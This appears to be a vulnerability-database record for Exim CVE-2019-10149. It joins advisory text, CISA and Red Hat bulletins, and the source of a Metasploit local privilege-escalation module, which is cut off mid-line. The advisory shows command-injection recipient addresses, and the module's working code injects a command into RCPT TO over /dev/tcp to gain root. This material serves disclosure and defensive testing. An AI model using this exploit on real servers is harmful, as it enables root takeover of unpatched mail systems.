attacker\nmust keep a connection to the vulnerable server open for 7 days (by\ntransmitting one byte every few minutes). However, because of the\nextreme complexity of Exim's code, we cannot guarantee that this\nexploitation method is unique; faster methods may exist.\n\nExim is vulnerable by default since version 4.87 (released on April 6,\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\n(released on February 10, 2019):\n\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\nhttps://bugs.exim.org/show_bug.cgi?id=2310\n\nbut was not identified as a security vulnerability, and most operating\nsystems are therefore affected. For example, we exploit an up-to-date\nDebian distribution (9.9) in this advisory.\n\n\n========================================================================\nLocal exploitation\n========================================================================\n\nThe vulnerable code is located in deliver_message():\n\n6122 #ifndef DISABLE_EVENT\n6123 if (process_recipients != RECIP_ACCEPT)\n6124 {\n6125 uschar * save_local = deliver_localpart;\n6126 const uschar * save_domain = deliver_domain;\n6127\n6128 deliver_localpart = expand_string(\n6129 string_sprintf(\"${local_part:%s}\", new->address));\n6130 deliver_domain = expand_string(\n6131 string_sprintf(\"${domain:%s}\", new->address));\n6132\n6133 (void) event_raise(event_action,\n6134 US\"msg:fail:internal\", new->message);\n6135\n6136 deliver_localpart = save_local;\n6137 deliver_domain = save_domain;\n6138 }\n6139 #endif\n\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\nexpansion item, and because new->address is the recipient of the mail\nthat is being delivered, a local attacker can simply send a mail to\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\nlocal_domains) and execute arbitrary commands, as root\n(deliver_drop_privilege is false, by default):\n\n[...]\n\n\n========================================================================\nRemote exploitation\n========================================================================\n\nOur local-exploitation method does not work remotely, because the\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\nconfiguration requires the local part of the recipient's address (the\npart that precedes the @ sign) to be the name of a local user:\n\n[...]\n\n------------------------------------------------------------------------\nNon-default configurations\n------------------------------------------------------------------------\n\nWe eventually devised an elaborate method for exploiting Exim remotely\nin its default configuration, but we first identified various\nnon-default configurations that are easy to exploit remotely:\n\n- If the \"verify = recipient\" ACL was removed manually by an\n administrator (maybe to prevent username enumeration via RCPT TO),\n then our local-exploitation method also works remotely.\n\n- If Exim was configured to recognize tags in the local part of the\n recipient's address (via \"local_part_suffix = +* : -*\" for example),\n then a remote attacker can simply reuse our local-exploitation method\n with an RCPT TO \"balrog+${run{...}}@localhost\" (where \"balrog\" is the\n name of a local user).\n\n- If Exim was configured to relay mail to a remote domain, as a\n secondary MX (Mail eXchange), then a remote attacker can simply reuse\n our local-exploitation method with an RCPT TO \"${run{...}}@khazad.dum\"\n (where \"khazad.dum\" is one of Exim's relay_to_domains). Indeed, the\n \"verify = recipient\" ACL can only check the domain part of a remote\n address (the part that follows the @ sign), not the local part.\n\n------------------------------------------------------------------------\nDefault configuration\n------------------------------------------------------------------------\n\n[...]\n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe thank Exim's developers, Solar Designer, and the members of\n[email\u00a0protected]\n\n\"The Return of the WIZard\" is a reference to Sendmail's ancient WIZ and\nDEBUG vulnerabilities:\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145\nhttps://seclists.org/bugtraq/1995/Feb/56\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095\nhttp://www.cheswick.com/ches/papers/berferd.pdf\n\n\n========================================================================\nTimeline\n========================================================================\n\n2019-05-27: Advisory sent to [email\u00a0protected]\n\n2019-05-28: Advisory sent to [email\u00a0protected]\n", "sourceHref": "https://0day.today/exploit/32848", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-27T18:20:26", "description": "Exim has released patches to address a vulnerability affecting Exim versions 4.87\u20134.91. A remote attacker could exploit this vulnerability to take control of an affected email server. This vulnerability was detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Exim [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) page and either upgrade to Exim 4.92 or apply the necessary patches.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2019/06/13/Exim-Releases-Security-Patches>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-06-13T00:00:00", "type": "cisa", "title": "Exim Releases Security Patches", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-13T00:00:00", "id": "CISA:8012376262FFBCAA3DBEE889B5EE4625", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/06/13/Exim-Releases-Security-Patches", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-27T18:18:25", "description": "The National Security Agency (NSA) has released a cybersecurity advisory on Russian advanced persistent threat (APT) group Sandworm exploiting a vulnerability\u2014CVE-2019-10149\u2014in Exim Mail Transfer Agent (MTA) software. An unauthenticated remote attacker can use this vulnerability to send a specially crafted email to execute commands with root privileges, allowing the attacker to install programs, modify data, and create new accounts.\n\nAlthough Exim released a [security update](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) for the MTA vulnerability in June 2019, Sandworm cyber actors have been exploiting this vulnerability in unpatched Exim servers since at least August 2019 according NSA\u2019s advisory, which provides indicators of compromise and mitigations to detect and block exploit attempts.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators and users to upgrade to the latest version of Exim and review NSA\u2019s [Advisory: Exim Mail Transfer Agent Actively Exploited by Russian GRU Cyber Actors](<https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf>) and Exim\u2019s page on [CVE-2019-10149](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-28T00:00:00", "type": "cisa", "title": "NSA Releases Advisory on Sandworm Actors Exploiting an Exim Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2020-05-28T00:00:00", "id": "CISA:0112C06A4ED522FC96CC36F94A083A95", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2023-06-13T15:00:02", "description": "A flaw was found in Exim, where improper validation of the recipient address in the deliver_message() function in /src/deliver.c occurred. An attacker could use this flaw to achieve remote command execution.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-04T12:51:00", "type": "redhatcve", "title": "CVE-2019-10149", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2023-04-06T05:51:03", "id": "RH:CVE-2019-10149", "href": "https://access.redhat.com/security/cve/cve-2019-10149", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-08-16T02:50:02", "description": "Exim 4 before 4.94.2 has Execution with Unnecessary Privileges. By leveraging a delete_pid_file race condition, a local user can delete arbitrary files as root. This involves the -oP and -oPX options.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.3, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-05-06T13:15:00", "type": "prion", "title": "CVE-2021-27216", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.3, "vectorString": "AV:L/AC:M/Au:N/C:N/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27216"], "modified": "2022-06-28T14:11:00", "id": "PRION:CVE-2021-27216", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-27216", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:N/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "cisa_kev", "title": "Exim Mail Transfer Agent (MTA) Improper Input Validation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2022-01-10T00:00:00", "id": "CISA-KEV-CVE-2019-10149", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-13T15:26:44", "description": "This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-04T14:02:03", "type": "metasploit", "title": "Exim 4.87 - 4.91 Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2023-02-02T07:17:02", "id": "MSF:EXPLOIT-LINUX-LOCAL-EXIM4_DELIVER_MESSAGE_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/exim4_deliver_message_priv_esc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Exim 4.87 - 4.91 Local Privilege Escalation',\n 'Description' => %q{\n This module exploits a flaw in Exim versions 4.87 to 4.91 (inclusive).\n Improper validation of recipient address in deliver_message()\n function in /src/deliver.c may lead to command execution with root privileges\n (CVE-2019-10149).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Qualys', # Discovery and PoC (@qualys)\n 'Dennis Herrmann', # Working exploit (@dhn)\n 'Marco Ivaldi', # Working exploit (@0xdea)\n 'Guillaume Andr\u00e9' # Metasploit module (@yaumn_)\n ],\n 'DisclosureDate' => '2019-06-05',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [\n [\n 'Exim 4.87 - 4.91',\n lower_version: Rex::Version.new('4.87'),\n upper_version: Rex::Version.new('4.91')\n ]\n ],\n 'DefaultOptions' => {\n 'PrependSetgid' => true,\n 'PrependSetuid' => true\n },\n 'References' => [\n [ 'CVE', '2019-10149' ],\n [ 'EDB', '46996' ],\n [ 'URL', 'https://www.openwall.com/lists/oss-security/2019/06/06/1' ]\n ],\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_fs_delete_file\n ]\n }\n }\n )\n )\n\n register_options(\n [\n OptInt.new('EXIMPORT', [ true, 'The port exim is listening to', 25 ])\n ]\n )\n\n register_advanced_options(\n [\n OptFloat.new('ExpectTimeout', [ true, 'Timeout for Expect when communicating with exim', 3.5 ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n )\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def encode_command(cmd)\n '\\x' + cmd.unpack('H2' * cmd.length).join('\\x')\n end\n\n def open_tcp_connection\n socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)\n params = Rex::Socket::Parameters.new({\n 'PeerHost' => '127.0.0.1',\n 'PeerPort' => datastore['EXIMPORT']\n })\n begin\n socket = socket_subsystem.create_tcp_client_channel(params)\n rescue StandardError => e\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n raise e\n end\n return socket_subsystem, socket\n end\n\n def inject_payload(payload)\n if session.type == 'meterpreter'\n socket_subsystem, socket = open_tcp_connection\n\n tcp_conversation = {\n nil => /220/,\n 'helo localhost' => /250/,\n 'MAIL FROM:<>' => /250/,\n \"RCPT TO:<${run{#{payload}}}@localhost>\" => /250/,\n 'DATA' => /354/,\n 'Received:' => nil,\n '.' => /250/\n }\n\n begin\n tcp_conversation.each do |line, pattern|\n if line\n if line == 'Received:'\n for i in (1..31)\n socket.puts(\"#{line} #{i}\\n\")\n end\n else\n socket.puts(\"#{line}\\n\")\n end\n end\n\n next unless pattern\n\n unless socket.expect(pattern, datastore['ExpectTimeout'])\n fail_with(Failure::TimeoutExpired, \"Pattern not found: #{pattern.inspect}\")\n end\n end\n rescue Rex::ConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n ensure\n socket.puts(\"QUIT\\n\")\n socket.close\n socket_subsystem.shutdown\n end\n else\n unless cmd_exec(\"/bin/bash -c 'exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}' \"\\\n '&& echo true').chomp.to_s == 'true'\n fail_with(Failure::NotFound, \"Port #{datastore['EXIMPORT']} is closed\")\n end\n\n bash_script = %|\n #!/bin/bash\n\n exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\n read -u 3 && echo $REPLY\n echo \"helo localhost\" >&3\n read -u 3 && echo $REPLY\n echo \"mail from:<>\" >&3\n read -u 3 && echo $REPLY\n echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3\n read -u 3 && echo $REPLY\n echo \"data\" >&3\n read -u 3 && echo $REPLY\n for i in $(seq 1 30); do\n echo 'Received: $i' >&3\n done\n echo \".\" >&3\n read -u 3 && echo $REPLY\n echo \"quit\" >&3\n read -u 3 && echo $REPLY\n |\n\n @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@bash_script_path, bash_script)\n register_file_for_cleanup(@bash_script_path)\n chmod(@bash_script_path)\n cmd_exec(\"/bin/bash -c \\\"#{@bash_script_path}\\\"\")\n end\n\n print_status('Payload sent, wait a few seconds...')\n Rex.sleep(5)\n end\n\n def on_new_session(session)\n super\n\n if session.type == 'meterpreter'\n session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')\n session.fs.file.rm(@payload_path)\n else\n session.shell_command_token(\"rm -f #{@payload_path}\")\n end\n end\n\n def check\n if session.type == 'meterpreter'\n begin\n socket_subsystem, socket = open_tcp_connection\n rescue StandardError\n return CheckCode::Safe\n end\n res = socket.gets\n socket.close\n socket_subsystem.shutdown\n else\n unless command_exists?('/bin/bash')\n return CheckCode::Safe('bash not found')\n end\n\n res = cmd_exec(\"/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && \"\\\n \"(read -u 3 && echo $REPLY) || echo false'\")\n if res == 'false'\n vprint_error(\"Couldn't connect to port #{datastore['EXIMPORT']}, \"\\\n 'are you sure exim is listening on this port? (see EXIMPORT)')\n return CheckCode::Safe\n end\n end\n\n if res =~ /Exim ([0-9\\.]+)/i\n version = Rex::Version.new(Regexp.last_match(1))\n vprint_status(\"Found exim version: #{version}\")\n if version >= target[:lower_version] && version <= target[:upper_version]\n return CheckCode::Appears\n else\n return CheckCode::Safe\n end\n end\n\n CheckCode::Unknown\n end\n\n def exploit\n if !datastore['ForceExploit'] && is_root?\n fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')\n end\n\n unless writable?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is not writable\")\n end\n\n if nosuid?(base_dir)\n fail_with(Failure::BadConfig, \"#{base_dir} is mounted nosuid\")\n end\n\n unless datastore['PrependSetuid'] && datastore['PrependSetgid']\n fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \\\n 'to get root privileges.')\n end\n\n unless session.type == 'meterpreter'\n unless command_exists?('/bin/bash')\n fail_with(Failure::NotFound, 'bash not found')\n end\n end\n\n @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))\n write_file(@payload_path, payload.encoded_exe)\n register_file_for_cleanup(@payload_path)\n inject_payload(encode_command(\"/bin/sh -c 'chown root #{@payload_path};\"\\\n